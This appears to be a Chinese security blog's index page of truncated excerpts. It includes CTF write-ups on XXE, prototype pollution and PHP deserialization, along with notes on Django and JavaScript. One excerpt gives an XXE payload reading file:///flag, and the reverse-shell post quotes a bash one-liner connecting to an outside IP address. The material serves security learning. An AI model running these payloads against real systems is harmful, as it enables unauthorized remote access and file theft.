[NCTF2019]Fake XML cookbook尝试登录无果，看到题目存在xml，猜测XXE，抓包发现传输数据符合xxe注入格式 payload 12345678<?xml version="1.0" ?><!DOCTYPE llw [<!ENTITY file SYSTEM "file:///flag">]&g...

xxe漏洞学习之前在做node.js 的题目的时候发现很多node.js的题目都是和xxe的结合起来，所以这里决定先来看一下xxe的知识点 XXE：全称为XML Enternal Entity Injection，中文名称：XML外部实体注入 既然是XML的漏洞，我们就先来看XML的基础知识点 XML基础声明文档 1<?xml version="1.0" encod...

Django开发之旅1django-admin startproject 项目名 可以简单看一下目录结构 1234567|-- 项目名 项目的容器| |-- __init__.py 一个空文件，告诉 Python 该目录是一个 Python 包| |-- asgi.py 一个 ASGI 兼容的 Web 服务器的入口，以便运行你的项目| |-- settings.py ...

原型链污染前面有两张博客对 JS 的继承和原型链进行了一个比较详细的解释，那么原型链污染也就比较好理解了 简单的说，就是我们控制私有属性(__proto__)指向的原型对象（prototype），将其的属性产生变更，那么所继承它的对象也会拥有这个属性 举一个最简单的例子 这里我们对Object1的原型进行属性设置，当我们执行console.log(object1.foo);时，会找到原型中...

[NPUCTF2020]验证🐎/source给到源码 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879const express =...

从原型到原型链前面主要大概了解了一些原型链的一些知识，这里重点深化一下 prototype每个函数都有一个 prototype 属性 函数的 prototype 属性指向了一个对象，这个对象正是调用该构造函数而创建的实例的原型 这也就构成了第一层关系 proto每一个JavaScript对象(除了 null )都具有的一个属性，叫__proto__，这个属性会指向该对象的原型 这样我们...

node12345678910const express = require("express");const app = express();app.get("/", (req, res) => { res.send("Hello World!");});app.listen(3000, () =>...

反弹shell最近看到的要用到反弹shell的地方比较多，这里做一个好好的理解 反弹shell的标准语句 1bash -i >& /dev/tcp/47.236.106.198/2333 0>&1 反弹shell的原因目标主机由于防火墙受限制，权限等问题无法实现正向连接或不适合用正向连接（攻击者在自己的机器去连接目标机器），这个时候就需要去使用到反弹shell ...

JavaScript基础知识点JavaScript 实现网站动态交互功能，提供网站动态交互性 一般应于html文档中 通常通过事件对网页进行交互 <script>和</script>之间的代码行包含了 JavaScript const声明 声明作用域内的局部常量 常量的值不能通过赋值改变 var let声明 声明作用域内的局部变量 变量的值可以更改 ...

这里做个赛后复现，记录一下一些比赛的时候没懂的知识点 ezpop1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950<?phperror_reporting(0);highlight_file(__FILE__);class AAA{ pub...